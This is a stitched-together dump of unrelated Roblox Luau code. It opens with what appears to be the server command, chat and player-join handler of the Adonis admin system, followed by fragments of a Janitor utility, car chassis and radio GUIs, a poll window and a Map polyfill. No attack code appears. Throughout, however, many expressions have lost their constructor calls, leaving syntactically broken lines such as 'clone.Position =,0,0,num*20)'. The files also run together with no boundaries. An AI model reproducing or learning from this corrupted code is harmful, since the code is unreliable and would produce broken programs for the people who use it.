p:Kick(":: Adonis :: Communication following disconnect.") elseif not com or type(com) ~= "string" or #com > 50 or cliData == "BadMemes" or com == "BadMemes" then Anti.Detected(p, "Kick", (tostring(com) ~= "BadMemes" and tostring(com)) or tostring(select(1, ...))) elseif cliData and type(cliData) ~= "table" then Anti.Detected(p, "Kick", "Invalid Client Data (r10002)") --elseif cliData and keys and cliData.Module ~= keys.Module then -- Anti.Detected(p, "Kick", "Invalid Client Module (r10006)") else local args = {...} local rateLimitCheck, didThrottleRL, canThrottleRL, curRemoteRate = RateLimit(p, "Remote") if keys then keys.LastUpdate = os.time() keys.Received += 1 if type(com) == "string" then if com == keys.Special.."GET_KEY" then if keys.LoadingStatus == "WAITING_FOR_KEY" then Remote.Fire(p, keys.Special.."GIVE_KEY", keys.Key) keys.LoadingStatus = "LOADING" keys.RemoteReady = true AddLog("Script", string.format("%s requested client keys", p.Name)) --else --Anti.Detected(p, "kick","Communication Key Error (r10003)") end AddLog("RemoteFires", { Text = p.Name.." requested key from server", Desc = "Player requested key from server", Player = p; }) elseif rateLimitCheck and string.len(com) <= Remote.MaxLen then local comString = Decrypt(com, keys.Key, keys.Cache) local command = (cliData.Mode == "Get" and Remote.Returnables[comString]) or Remote.Commands[comString] AddLog("RemoteFires", { Text = string.format("%s fired %s; Arg1: %s", tostring(p), comString, tostring(args[1])); Desc = string.format("Player fired remote command %s; %s", comString, Functions.ArgsToString(args)); Player = p; }) if command then local rets = {TrackTask("Remote: ".. p.Name ..": ".. tostring(comString), command, p, args)} if not rets[1] then logError(p, tostring(comString) .. ": ".. tostring(rets[2])) else return {unpack(rets, 2)} end else Anti.Detected(p, "Kick", "Invalid Remote Data (r10004)") end elseif rateLimitCheck and RateLimit(p, "RateLog") then Anti.Detected(p, "Log", string.format("Firing RemoteEvent too quickly (>Rate: %s/sec)", curRemoteRate)); warn(string.format("%s is firing Adonis's RemoteEvent too quickly (>Rate: %s/sec)", p.Name, curRemoteRate)); end else Anti.Detected(p, "Log", "Out of Sync (r10005)") end end end end end; Command = function(p, msg, opts, noYield) opts = opts or {} --[[if Admin.IsBlacklisted(p) then return false end]] if #msg > Process.MsgStringLimit and type(p) == "userdata" and p:IsA("Player") and not Admin.CheckAdmin(p) then msg = string.sub(msg, 1, Process.MsgStringLimit) end msg = Functions.Trim(msg) if string.match(msg, Settings.BatchKey) then for cmd in string.gmatch(msg,'[^'..Settings.BatchKey..']+') do cmd = Functions.Trim(cmd) local waiter = Settings.PlayerPrefix.."wait" if string.sub(string.lower(cmd), 1, #waiter) == waiter then local num = tonumber(string.sub(cmd, #waiter + 1)) if num then wait(tonumber(num)) end else Process.Command(p, cmd, opts, false) end end else local pData = opts.PlayerData or (p and Core.GetPlayer(p)) msg = (pData and Admin.AliasFormat(pData.Aliases, msg)) or msg if string.match(msg, Settings.BatchKey) then return Process.Command(p, msg, opts, false) end local index, command, matched = Admin.GetCommand(msg) if not command then if opts.Check then Remote.MakeGui(p, "Output", { Title = "Output"; Message = if Settings.SilentCommandDenials then string.format("'%s' is either not a valid command, or you do not have permission to run it.", msg) else string.format("'%s' is not a valid command.", msg); }) end return end local allowed, denialMessage = false, nil local isSystem = false local pDat = { Player = opts.Player or p; Level = opts.AdminLevel or Admin.GetLevel(p); isDonor = opts.IsDonor or (Admin.CheckDonor(p) and (Settings.DonorCommands or command.AllowDonors)); } if opts.isSystem or p == "SYSTEM" then isSystem = true allowed = not command.Disabled p = p or "SYSTEM" else allowed, denialMessage = Admin.CheckPermission(pDat, command, false, opts) end if not allowed then if not (isSystem or opts.NoOutput) and (denialMessage or not Settings.SilentCommandDenials or opts.Check) then Remote.MakeGui(p, "Output", { Message = denialMessage or (if Settings.SilentCommandDenials then string.format("'%s' is either not a valid command, or you do not have permission to run it.", msg) else string.format("You do not have permission to run '%s'.", msg)); }) end return end local cmdArgs = command.Args or command.Arguments local argString = string.match(msg, "^.-"..Settings.SplitKey.."(.+)") or "" local args = (opts.Args or opts.Arguments) or (#cmdArgs > 0 and Functions.Split(argString, Settings.SplitKey, #cmdArgs)) or {} local taskName = string.format("Command :: %s : (%s)", p.Name, msg) if #args > 0 and not isSystem and command.Filter or opts.Filter then for i, arg in args do local cmdArg = cmdArgs[i] if cmdArg then if Admin.IsLax(cmdArg) == false then args[i] = service.LaxFilter(arg, p) end else args[i] = service.LaxFilter(arg, p) end end end if opts.CrossServer or (not isSystem and not opts.DontLog) then AddLog("Commands", { Text = ((opts.CrossServer and "[CRS_SERVER] ") or "") .. p.Name; Desc = matched .. Settings.SplitKey .. table.concat(args, Settings.SplitKey); Player = p; }) if Settings.ConfirmCommands then Functions.Hint("Executed Command: [ "..msg.." ]", {p}) end end if noYield then taskName = "Thread: " .. taskName end Admin.UpdateCooldown(pDat, command) local ran, cmdError = TrackTask(taskName, command.Function, p, args, { PlayerData = pDat, Options = opts }) if not opts.IgnoreErrors then if type(cmdError) == "string" then AddLog("Errors", "["..matched.."] "..cmdError) cmdError = cmdError:match("%d: (.+)$") or cmdError if not isSystem then Remote.MakeGui(p, "Output", { Message = cmdError, }) end elseif cmdError ~= nil and cmdError ~= true and not isSystem then Remote.MakeGui(p, "Output", { Message = "There was an error but the error was not a string? : "..tostring(cmdError); }) end end service.Events.CommandRan:Fire(p, { Message = msg, Matched = matched, Args = args, Command = command, Index = index, Success = ran, Error = if type(cmdError) == "string" then cmdError else nil, Options = opts, PlayerData = pDat }) end end; CrossServerChat = function(data) if data then for _, v in service.GetPlayers() do if Admin.GetLevel(v) > 0 then Remote.Send(v, "handler", "ChatHandler", data.Player, data.Message, "Cross") end end end end; CustomChat = function(p, a, b, canCross) local didPassRate, didThrottle, canThrottle, curRate, maxRate = RateLimit(p, "CustomChat") if didPassRate and not Admin.IsMuted(p) then if type(a) == "string" then a = string.sub(a, 1, Process.MsgStringLimit) end if b == "Cross" then if canCross and Admin.CheckAdmin(p) then Core.CrossServer("ServerChat", {Player = p.Name, Message = a}) --Core.SetData("CrossServerChat",{Player = p.Name, Message = a}) end else local target = Settings.SpecialPrefix..'all' if not b then b = 'Global' end if not service.Players:FindFirstChild(p.Name) then b='Nil' end if string.sub(a,1,1)=='@' then b='Private' target,a=string.match(a,'@(.%S+) (.+)') Remote.Send(p,'Function','SendToChat',p,a,b) elseif string.sub(a,1,1)=='#' then if string.sub(a,1,7)=='#ignore' then target=string.sub(a,9) b='Ignore' end if string.sub(a,1,9)=='#unignore' then target=string.sub(a,11) b='UnIgnore' end end for _, v in service.GetPlayers(p, target, { DontError = true; }) do local a = service.Filter(a, p, v) if p.Name == v.Name and b ~= "Private" and b ~= "Ignore" and b ~= "UnIgnore" then Remote.Send(v,"Handler","ChatHandler",p,a,b) elseif b == "Global" then Remote.Send(v,"Handler","ChatHandler",p,a,b) elseif b == "Team" and p.TeamColor == v.TeamColor then Remote.Send(v,"Handler","ChatHandler",p,a,b) elseif b == "Local" and p:DistanceFromCharacter(v.Character.Head.Position) < 80 then Remote.Send(v,"Handler","ChatHandler",p,a,b) elseif b == "Admins" and Admin.CheckAdmin(p) then Remote.Send(v,"Handler","ChatHandler",p,a,b) elseif b == "Private" and v.Name ~= p.Name then Remote.Send(v,"Handler","ChatHandler",p,a,b) elseif b == "Nil" then Remote.Send(v,"Handler","ChatHandler",p,a,b) --[[elseif b == 'Ignore' and v.Name ~= p.Name then Remote.Send(v,'AddToTable','IgnoreList',v.Name) elseif b == 'UnIgnore' and v.Name ~= p.Name then Remote.Send(v,'RemoveFromTable','IgnoreList',v.Name)--]] end end end service.Events.CustomChat:Fire(p,a,b) elseif not didPassRate and RateLimit(p, "RateLog") then Anti.Detected(p, "Log", string.format("CustomChatting too quickly (>Rate: %s/sec)", curRate)) warn(string.format("%s is CustomChatting too quickly (>Rate: %s/sec)", p.Name, curRate)) end end; Chat = function(p, msg) local didPassRate, didThrottle, canThrottle, curRate, maxRate = RateLimit(p, "Chat") if didPassRate then local isMuted = Admin.IsMuted(p); if utf8.len(utf8.nfcnormalize(msg)) > Process.MaxChatCharacterLimit and not Admin.CheckAdmin(p) then Anti.Detected(p, "Kick", "Chatted message over the maximum character limit") elseif not isMuted then local msg = string.sub(msg, 1, Process.MsgStringLimit) local filtered = service.LaxFilter(msg, p) AddLog(Logs.Chats, { Text = p.Name..": " .. tostring(filtered); Desc = tostring(filtered); Player = p; }) if Settings.ChatCommands then if Admin.DoHideChatCmd(p, msg) then Remote.Send(p,"Function","ChatMessage","> "..msg,, 1, 1)) Process.Command(p, msg, {Chat = true;}) elseif string.sub(msg, 1, 3) == "/e " then service.Events.PlayerChatted:Fire(p, msg) msg = string.sub(msg, 4) Process.Command(p, msg, {Chat = true;}) elseif string.sub(msg, 1, 8) == "/system " then service.Events.PlayerChatted:Fire(p, msg) msg = string.sub(msg, 9) Process.Command(p, msg, {Chat = true;}) else service.Events.PlayerChatted:Fire(p, msg) Process.Command(p, msg, {Chat = true;}) end else service.Events.PlayerChatted:Fire(p, msg) end elseif isMuted then local msg = string.sub(msg, 1, Process.MsgStringLimit); local filtered = service.LaxFilter(msg, p) AddLog(Logs.Chats, { Text = "[MUTED] ".. p.Name ..": "..tostring(filtered); Desc = tostring(filtered); Player = p; }) end elseif not didPassRate and RateLimit(p, "RateLog") then Anti.Detected(p, "Log", string.format("Chatting too quickly (>Rate: %s/sec)", curRate)) warn(string.format("%s is chatting too quickly (>Rate: %s/sec)", p.Name, curRate)) end end; --[==[ WorkspaceChildAdded = function(c) --[[if c:IsA("Model") then local p = service.Players:GetPlayerFromCharacter(c) if p then service.TrackTask(p.Name..": CharacterAdded", Process.CharacterAdded, p) end end -- Moved to PlayerAdded handler --]] end; LogService = function(Message, Type) --service.Events.Output:Fire(Message, Type) end; ErrorMessage = function(Message, Trace, Script) --[[if Running then service.Events.ErrorMessage:Fire(Message, Trace, Script) if Message:lower():find("adonis") or Message:find(script.Name) then logError(Message) end end--]] end; ]==] PlayerAdded = function(p) AddLog("Script", "Doing PlayerAdded Event for ".. p.Name) local key = tostring(p.UserId) local keyData = { Player = p; Key = Functions.GetRandom(); Cache = {}; Sent = 0; Received = 0; LastUpdate = os.time(); FinishedLoading = false; LoadingStatus = "WAITING_FOR_KEY"; --Special = Core.MockClientKeys and Core.MockClientKeys.Special; --Module = Core.MockClientKeys and Core.MockClientKeys.Module; } Core.UpdatePlayerConnection(p) Core.PlayerData[key] = nil Remote.Clients[key] = keyData local ran, err = Pcall(function() Routine(function() if Anti.UserSpoofCheck(p) then Remote.Clients[key] = nil; Anti.Detected(p, "kick", "Username Spoofing"); end end) local PlayerData = Core.GetPlayer(p) local level = Admin.GetLevel(p) local banned, reason = Admin.CheckBan(p) if banned then Remote.Clients[key] = nil; p:Kick(string.format("%s | Reason: %s", Variables.BanMessage, (reason or "No reason provided"))) return "REMOVED" end if Variables.ServerLock and level < 1 then Remote.Clients[key] = nil; p:Kick(Variables.LockMessage or "::Adonis::\nServer Locked") return "REMOVED" end if Variables.Whitelist.Enabled then local listed = false local CheckTable = Admin.CheckTable for listName, list in Variables.Whitelist.Lists do if CheckTable(p, list) then listed = true break; end end if not listed and level == 0 then Remote.Clients[key] = nil; p:Kick(Variables.LockMessage or "::Adonis::\nWhitelist Enabled") return "REMOVED" end end end) if not ran then AddLog("Errors", p.Name .." PlayerAdded Failed: ".. tostring(err)) warn("~! :: Adonis :: SOMETHING FAILED DURING PLAYERADDED:") warn(tostring(err)) end if Remote.Clients[key] then Core.HookClient(p) AddLog("Script", { Text = p.Name .. " loading started"; Desc = p.Name .. " successfully joined the server"; }) AddLog("Joins", { Text = p.Name; Desc = p.Name.." joined the server"; Player = p; }) --// Get chats p.Chatted:Connect(function(msg) local ran, err = TrackTask(p.Name .. "Chatted", Process.Chat, p, msg) if not ran then logError(err); end end) --// Character added p.CharacterAdded:Connect(function(...) local ran, err = TrackTask(p.Name .. "CharacterAdded", Process.CharacterAdded, p, ...) if not ran then logError(err); end end) delay(600, function() if p.Parent and Core.PlayerData[key] and Remote.Clients[key] and Remote.Clients[key] == keyData and keyData.LoadingStatus ~= "READY" then AddLog("Script", { Text = p.Name .. " Failed to Load", Desc = tostring(keyData.LoadingStatus)..": Client failed to load in time (10 minutes?)", Player = p; }); --Anti.Detected(p, "kick", "Client failed to load in time (10 minutes?)"); end end) elseif ran and err ~= "REMOVED" then Anti.RemovePlayer(p, "\n:: Adonis ::\nLoading Error [Missing player, keys, or removed]") end end; PlayerRemoving = function(p) local data = Core.GetPlayer(p) local key = tostring(p.UserId) service.Events.PlayerRemoving:Fire(p) delay(1, function() if not service.Players:GetPlayerByUserId(p.UserId) then Core.PlayerData[key] = nil end end) AddLog("Script", { Text = string.format("Triggered PlayerRemoving for %s", p.Name); Desc = "Player left the game (PlayerRemoving)"; Player = p; }) AddLog("Leaves", { Text = p.Name; Desc = p.Name.." left the server"; Player = p; }) Core.SavePlayerData(p, data) Variables.TrackingTable[p.Name] = nil for otherPlrName, trackTargets in Variables.TrackingTable do if trackTargets[p] then trackTargets[p] = nil local otherPlr = service.Players:FindFirstChild(otherPlrName) if otherPlr then task.defer(Remote.RemoveLocal, otherPlr, p.Name.."Tracker") end end end if Commands.UnDisguise then Commands.UnDisguise.Function(p, {"me"}) end Variables.IncognitoPlayers[p] = nil end; FinishLoading = function(p) local PlayerData = Core.GetPlayer(p) local level = Admin.GetLevel(p) local key = tostring(p.UserId) --// Fire player added service.Events.PlayerAdded:Fire(p) AddLog("Script", { Text = string.format("%s finished loading", p.Name); Desc = "Client finished loading"; }) --// Run OnJoin commands for i,v in Settings.OnJoin do TrackTask("Thread: OnJoin_Cmd: ".. tostring(v), Admin.RunCommandAsPlayer, v, p) AddLog("Script", { Text = "OnJoin: Executed "..tostring(v); Desc = "Executed OnJoin command; "..tostring(v) }) end --// Start keybind listener Remote.Send(p, "Function", "KeyBindListener", PlayerData.Keybinds or {}) --// Load some playerdata stuff if type(PlayerData.Client) == "table" then if PlayerData.Client.CapesEnabled == true or PlayerData.Client.CapesEnabled == nil then Remote.Send(p, "Function", "MoveCapes") end Remote.Send(p, "SetVariables", PlayerData.Client) else Remote.Send(p, "Function", "MoveCapes") end --// Load all particle effects that currently exist Functions.LoadEffects(p) --// Load admin or non-admin specific things if level < 1 then if Settings.AntiSpeed then Remote.Send(p, "LaunchAnti", "Speed", { Speed = tostring(60.5 + math.random(9e8)/9e8) }) end if Settings.Detection then Remote.Send(p, "LaunchAnti", "MainDetection") end if Settings.AntiBuildingTools then Remote.Send(p, "LaunchAnti", "AntiTools", {BTools = true}) end end --// Finish things up if Remote.Clients[key] then Remote.Clients[key].FinishedLoading = true if p.Character and p.Character.Parent == workspace then --service.Threads.TimeoutRunTask(p.Name..";CharacterAdded",Process.CharacterAdded,60,p) local ran, err = TrackTask(p.Name .." CharacterAdded", Process.CharacterAdded, p, p.Character) if not ran then logError(err) end else if Settings.Console and (not Settings.Console_AdminsOnly or level > 0) then Remote.MakeGui(p, "Console") end if Settings.HelpButton then Remote.MakeGui(p, "HelpButton") end end if level > 0 then local oldVer = (level > 300) and Core.GetData("VersionNumber") local newVer = (level > 300) and tonumber(string.match(server.Changelog[1], "Version: (.*)")) if Settings.Notification then wait(2) Remote.MakeGui(p, "Notification", { Title = "Welcome."; Message = "Click here for commands."; Icon = server.MatIcons["Verified user"]; Time = 15; OnClick = Core.Bytecode("client.Remote.Send('ProcessCommand','"..Settings.Prefix.."cmds')"); }) wait(1) if oldVer and newVer and newVer > oldVer then Remote.MakeGui(p, "Notification", { Title = "Updated!"; Message = "Click to view the changelog."; Icon = server.MatIcons.Description; Time = 10; OnClick = Core.Bytecode("client.Remote.Send('ProcessCommand','"..Settings.Prefix.."changelog')"); }) end wait(1) if level > 300 and Settings.DataStoreKey == Defaults.Settings.DataStoreKey then Remote.MakeGui(p, "Notification", { Title = "Warning!"; Message = "Using default datastore key!"; Icon = server.MatIcons.Description; Time = 10; OnClick = Core.Bytecode([[ local window = client.UI.Make("Window", { Title = "How to change the DataStore key"; Size = {700,300}; Icon = "rbxassetid://7510994359"; }) window:Add("ImageLabel", { Image = "rbxassetid://1059543904"; }) window:Ready() ]]); }) end end if newVer then Core.SetData("VersionNumber", newVer) end end --// REF_1_ALBRT - 57s_Dxl - 100392_659; --// COMP[[CHAR+OFFSET] < INT[0]] --// EXEC[[BYTE[N]+BYTE[x]] + ABS[CHAR+OFFSET]] --// ELSE[[BYTE[A]+BYTE[x]] + ABS[CHAR+OFFSET]] --// VALU -> c_BYTE ; CAT[STR,x,c_BYTE] -> STR ; OUT[STR]]] --// [-150x261x247x316x246x243x238x248x302x316x261x247x316x246x234x247x247x302] --// END_ReF - 100392_659 for v: Player in Variables.IncognitoPlayers do --// Check if the Player still exists before doing incognito to prevent LoadCode spam. if v == p or v.Parent == service.Players then continue end Remote.LoadCode(p, [[ local plr = service.Players:GetPlayerByUserId(]] .. v.UserId .. [[) if plr then if not table.find(service.IncognitoPlayers, plr) then table.insert(service.IncognitoPlayers, plr) end plr:Remove() end ]]) end end end; CharacterAdded = function(p, char, ...) local key = tostring(p.UserId) local keyData = Remote.Clients[key] if keyData then keyData.PlayerLoaded = true end wait(1 / 60) if char and keyData and keyData.FinishedLoading then local level = Admin.GetLevel(p) --// Wait for UI stuff to finish wait(1) if not p:FindFirstChildWhichIsA("PlayerGui") then p:WaitForChild("PlayerGui", 9e9) end Remote.Get(p,"UIKeepAlive") --//GUI loading local MakeGui = Remote.MakeGui local Refresh = Remote.RefreshGui local RefreshGui = function(gui, ignore, ...) Refresh(p, gui, ignore, ...) end if Variables.NotifMessage then MakeGui(p, "Notif", { Message = Variables.NotifMessage }) end if Settings.Console and (not Settings.Console_AdminsOnly or (Settings.Console_AdminsOnly and level > 0)) then RefreshGui("Console") end if Settings.HelpButton then MakeGui(p, "HelpButton") end if Settings.TopBarShift then MakeGui(p, "TopBar") end --if Settings.CustomChat then -- MakeGui(p, "Chat") --end --if Settings.PlayerList then -- MakeGui(p, "PlayerList") --end if level < 1 then if Settings.AntiNoclip then Remote.Send(p, "LaunchAnti", "HumanoidState") end end --// Check muted --[=[for ind,admin in Settings.Muted do if Admin.DoCheck(p, admin) then Remote.LoadCode(p, [[service.StarterGui:SetCoreGuiEnabled("Chat",false) client.Variables.ChatEnabled = false client.Variables.Muted = true]]) end end--]=] task.spawn(Functions.Donor, p) --// Fire added event service.Events.CharacterAdded:Fire(p, char, ...) --// Run OnSpawn commands for _, v in Settings.OnSpawn do TrackTask("Thread: OnSpawn_Cmd: ".. tostring(v), Admin.RunCommandAsPlayer, v, p) AddLog("Script", { Text = "OnSpawn: Executed "..tostring(v); Desc = "Executed OnSpawn command; "..tostring(v); }) end if server.Commands.Track and char:WaitForChild("Head", 5) and char:WaitForChild("HumanoidRootPart", 2) then for otherPlrName, trackTargets in Variables.TrackingTable do if trackTargets[p] then server.Commands.Track.Function(service.Players[otherPlrName], {"@"..p.Name, "true"}) end end end end end; NetworkAdded = function(cli) wait(0.25) local p = cli:GetPlayer() if p then Core.Connections[cli] = p AddLog("Script", { Text = p.Name .. " connected"; Desc = p.Name .. " successfully established a connection with the server"; Player = p; }) else AddLog("Script", { Text = "<UNKNOWN> connected"; Desc = "An unknown user successfully established a connection with the server"; }) end service.Events.NetworkAdded:Fire(cli) end; NetworkRemoved = function(cli) local p = cli:GetPlayer() or Core.Connections[cli] Core.Connections[cli] = nil if p then Anti.KickedPlayers[p] = nil AddLog("Script", { Text = p.Name .. " disconnected"; Desc = p.Name .. " disconnected from the server"; Player = p; }) else AddLog("Script", { Text = "<UNKNOWN> disconnected"; Desc = "An unknown user disconnected from the server"; }) end service.Events.NetworkRemoved:Fire(cli) end; --[[ PlayerTeleported = function(p,data) end; ]] }; end
--[[ Constructs and returns objects which can be used to model derived reactive state. ]]
local Package = script.Parent.Parent local captureDependencies = require(Package.Dependencies.captureDependencies) local initDependency = require(Package.Dependencies.initDependency) local useDependency = require(Package.Dependencies.useDependency) local logErrorNonFatal = require(Package.Logging.logErrorNonFatal) local class = {} local CLASS_METATABLE = {__index = class} local WEAK_KEYS_METATABLE = {__mode = "k"}
--[[ Top Level Roblox Services ]]
-- local PlayersService = game:GetService("Players") local RunService = game:GetService("RunService")
--// All global vars will be wiped/replaced except script --// All guis are autonamed using client.Functions.GetRandom()
return function(data) local gui = client.UI.Prepare(script.Parent.Parent) local playergui = service.PlayerGui local frame = gui.Drag.Frame local close = gui.Drag.Frame.Close local main = gui.Drag.Frame.Main local ques = gui.Drag.Frame.Main.Question local ans = gui.Drag.Frame.Main.Answers local entry = gui.Entry local question = data.Question local answers = data.Answers local selected ques.Text = question close.MouseButton1Click:connect(function() gui:Destroy() selected = false end) local num = 0 for i,v in pairs(answers) do local clone = entry:clone() clone.Parent = ans clone.Text = v clone.Position =,0,0,num*20) clone.Visible = true clone.MouseButton1Click:connect(function() gui:Destroy() selected = v end) num=num+1 end gTable:Ready() local temp = 0 repeat wait(0.1) temp=temp+0.1 until temp>60 or selected~=nil if gui and gui.Parent then gui:Destroy() end return selected end
mouse.KeyDown:connect(function (key) key = string.lower(key) if key == "u" then --Window controls if windows == false then winfob.Visible = true windows = true else windows = false winfob.Visible = false end elseif key == "[" then -- volume down if carSeat.Parent.Body.MP.Sound.Volume > 0 then handler:FireServer('updateVolume', -0.2) end elseif key == "]" then -- volume up if carSeat.Parent.Body.MP.Sound.Volume < 10 then handler:FireServer('updateVolume', 0.2) end end end) --Play the next song handler:FireServer('updateSong', end) mouse.KeyUp:connect(function (key) key = string.lower(key) if key:byte() == 48 then --Camera controls st = false end end) HUB2.W.MouseButton1Click:connect(function() handler:FireServer('wws',carSeat.WS.Value,st) handler:FireServer('wwr',carSeat.WS.Value,st) end) HUB2.UpW.MouseButton1Click:connect(function() handler:FireServer('wspd',1) end) HUB2.DnW.MouseButton1Click:connect(function() handler:FireServer('wspd',-1) end) HUB2.SS.MouseButton1Click:connect(function() carSeat.SST.Value = not carSeat.SST.Value end) for i,v in pairs(script.Parent:getChildren()) do if v:IsA('TextButton') then v.MouseButton1Click:connect(function() if carSeat.Windows:FindFirstChild(v.Name) then local v = carSeat.Windows:FindFirstChild(v.Name) if v.Value == true then handler:FireServer('updateWindows', v.Name, false) else handler:FireServer('updateWindows', v.Name, true) end end end) end end
--[[ streamable = Instance, childName: string) streamable:Observe(handler: (child: Instance, janitor: Janitor) -> void): Connection streamable:Destroy() --]]
type StreamableWithInstance = { Instance: Instance?, [any]: any, } local Janitor = require(script.Parent.Janitor) local Signal = require(script.Parent.Signal) local Streamable = {} Streamable.__index = Streamable function Instance, childName: string) local self: StreamableWithInstance = {} setmetatable(self, Streamable) self._janitor = self._shown = self._shownJanitor = self._janitor:Add(self._shownJanitor) self.Instance = parent:FindFirstChild(childName) local function OnInstanceSet() local instance = self.Instance if typeof(instance) == "Instance" then self._shown:Fire(instance, self._shownJanitor) self._shownJanitor:Add(instance:GetPropertyChangedSignal("Parent"):Connect(function() if not instance.Parent then self._shownJanitor:Cleanup() end end)) self._shownJanitor:Add(function() if self.Instance == instance then self.Instance = nil end end) end end local function OnChildAdded(child: Instance) if child.Name == childName and not self.Instance then self.Instance = child OnInstanceSet() end end self._janitor:Add(parent.ChildAdded:Connect(OnChildAdded)) if self.Instance then OnInstanceSet() end return self end function Streamable:Observe(handler) if self.Instance then task.spawn(handler, self.Instance, self._shownJanitor) end return self._shown:Connect(handler) end function Streamable:Destroy() self._janitor:Destroy() end local s =, "X") export type Streamable = typeof(s) s:Destroy() return Streamable
--[=[ @param object any -- Object to track @param cleanupMethod string? -- Optional cleanup name override @return object: any Adds an object to the Janitor. Once the Janitor is cleaned or destroyed, the object will also be cleaned up. The object must be any of the following: - Roblox instance (e.g. Part) - RBXScriptConnection (e.g. `workspace.ChildAdded:Connect(function() end)`) - Function - Table with either a `Destroy` or `Disconnect` method - Table with custom `cleanupMethod` name provided Returns the object added. ```lua -- Add a part to the Janitor, then destroy the Janitor, -- which will also destroy the part: local part ="Part") Janitor:Add(part) Janitor:Destroy() -- Add a function to the Janitor: Janitor:Add(function() print("Cleanup!") end) Janitor:Destroy() -- Standard cleanup from table: local tbl = {} function tbl:Destroy() print("Cleanup") end Janitor:Add(tbl) -- Custom cleanup from table: local tbl = {} function tbl:DoSomething() print("Do something on cleanup") end Janitor:Add(tbl, "DoSomething") ``` ]=]
function Janitor:Add(object: any, cleanupMethod: string?): any local cleanup = GetObjectCleanupFunction(object, cleanupMethod) table.insert(self._objects, {object, cleanup}) return object end
--[[ Classes.RadioButtonLabel This class creates a single radio button label. Constructors: new(frame [instance]) > Create(text) > Creates a RadioButtonLabel from the text provided. Properties: Frame [instance] > The container frame for the RadioButtonLabel. Can be used for positioning and resizing. Button [instance] > The button used to track when the user clicks on the radio button or not Methods: :GetValue() [boolean] > Returns whether the button is selected or not. :SetValue(bool [boolean]) [void] > Sets if the button is selected or not :Destroy() [void] > Destroys the RadioButtonLabel and all the events, etc that were running it. --]]
-- WorldSpace -> ScreenSpace. Raw function taking a world position and giving you the -- screen position.
function ScreenSpace.WorldToScreen(at) local point = Workspace.CurrentCamera.CoordinateFrame:pointToObjectSpace(at) local aspectRatio = ScreenSpace.AspectRatio() local hfactor = math.tan(math.rad(Workspace.CurrentCamera.FieldOfView)/2) local wfactor = aspectRatio*hfactor -- local x = (point.x/point.z) / -wfactor local y = (point.y/point.z) / hfactor -- return*(0.5 + 0.5*x), ScreenSpace.ViewSizeY()*(0.5 + 0.5*y)) end
--[[ LOWGames Studios Date: 27 October 2022 by Elder ]]
-- local u1 = nil; coroutine.wrap(function() u1 = require(game.ReplicatedStorage:WaitForChild("Framework"):WaitForChild("Library")); end)(); return function(p1, p2) for v1, v2 in ipairs(p1) do if v2 == p2 then return true; end; end; return false; end;
--This module is meant for functions that are universally used across all FX modules
local GameFXModule = {} return GameFXModule
--[[ ___ _______ _ / _ |____/ ___/ / ___ ____ ___ (_)__ / __ /___/ /__/ _ \/ _ `(_-<(_-</ (_-< /_/ |_| \___/_//_/\_,_/___/___/_/___/ SecondLogic @ Inspare ]]
local FE = workspace.FilteringEnabled local car = script.Parent.Car.Value local handler = car:WaitForChild("AC6_FE_Sounds") local _Tune = require(car["A-Chassis Tune"]) local on = 0 local mult=0 local det=0 local trm=0 local trmmult=0 local trmon=0 local throt=0 local redline=0 local shift=0 script:WaitForChild("Rev")
--// Ammo Settings
Ammo = 8; StoredAmmo = 8; MagCount = 900;
EngineModule.StartUp = function() engine.StartUp:Play() for _,s in pairs(Misc:GetChildren()) do if s.Name == "Vents" then s.Smoke.Enabled = true end end for _,i in pairs(Misc:GetChildren()) do if i.Name == "Rotor" and i:FindFirstChild("Motor") ~= nil then repeat wait(0.05) i.Motor.MaxVelocity = i.Motor.MaxVelocity + 0.005 until i.Motor.MaxVelocity >= 0.3 end end wait(StartUpTime) engine.Flying:Play() engine.StartUp:Stop() for _,e in pairs(Misc:GetChildren()) do if e.Name == "Vents" then e.Smoke.Enabled = false end end end
local Paint = false script.Parent.MouseButton1Click:connect(function() Paint = not Paint handler:FireServer("Sunrise",Paint) end)
-- this bit 1 means constant (0 means register)
luaP.BITRK = math.ldexp(1, luaP.SIZE_B - 1)
if script.Parent.Parent.Parent.IsOn.Value then script.Parent.Parent:TweenPosition(, 200, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end script.Parent.Parent.Parent.IsOn.Changed:connect(function() if script.Parent.Parent.Parent.IsOn.Value then script.Parent.Parent:TweenPosition(, 200, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end end) local handler = car.Taxi script.Parent.MouseButton1Click:connect(function() if car.Body.Taxi.F.L.L.Enabled == false then handler:FireServer("Lights",1) script.Parent.BackgroundColor3 =,255/255,0) script.Parent.TextStrokeColor3 =,255/255,0) for index, child in pairs(car.Body.Taxi.F:GetChildren()) do child.Material = Enum.Material.Neon child.L.Enabled = true end elseif car.Body.Taxi.F.L.L.Enabled == true then handler:FireServer("Lights",0) script.Parent.BackgroundColor3 =,0,0) script.Parent.TextStrokeColor3 =,0,0) for index, child in pairs(car.Body.Taxi.F:GetChildren()) do child.Material = Enum.Material.SmoothPlastic child.L.Enabled = false end end end)
-- How rare the weapon is and how hard it is to get.
if _M.DropsWeapon2 == true and DropChance == (_M.WeaponChance2) then -- If the correct value is pulled, enable the item to be dropped Enemy.Died:Connect(DropItem) -- Drop item if dead end
-- Implements Javascript's `Map.prototype.forEach` as defined below --
function Map:forEach(callback: mapCallbackFn<any, any> | mapCallbackFnWithThisArg<any, any>, thisArg: Object?): () if _G.__DEV__ then if typeof(callback) ~= "function" then error("callback is not a function") end end -- note: we can't turn this into a simple for-in loop, because the callbacks can modify the table and React, GQL, and Jest rely on JS behavior in that scenario arrayForEach(self._array, function(key) local value = self._map[key] if thisArg ~= nil then (callback :: mapCallbackFnWithThisArg<any, any>)(thisArg, value, key, self) else (callback :: mapCallbackFn<any, any>)(value, key, self) end end) end function Map:has(key): boolean return self._map[key] ~= nil end function Map:keys() return self._array end function Map:values() return arrayMap(self._array, function(key) return self._map[key] end) end function Map:entries() return arrayMap(self._array, function(key) return { key, self._map[key] } end) end function Map:ipairs() if _G.__DEV__ then warn( debug.traceback( "`for _,_ in myMap:ipairs() do` is deprecated and will be removed in a future release, please use `for _,_ in myMap do` instead\n", 2 ) ) end return ipairs(self:entries()) end function Map.__iter(self) return next, self:entries() end function Map.__index(self, key) local mapProp = rawget(Map, key) if mapProp ~= nil then return mapProp end return Map.get(self, key) end function Map.__newindex(table_, key, value) table_:set(key, value) end return Map
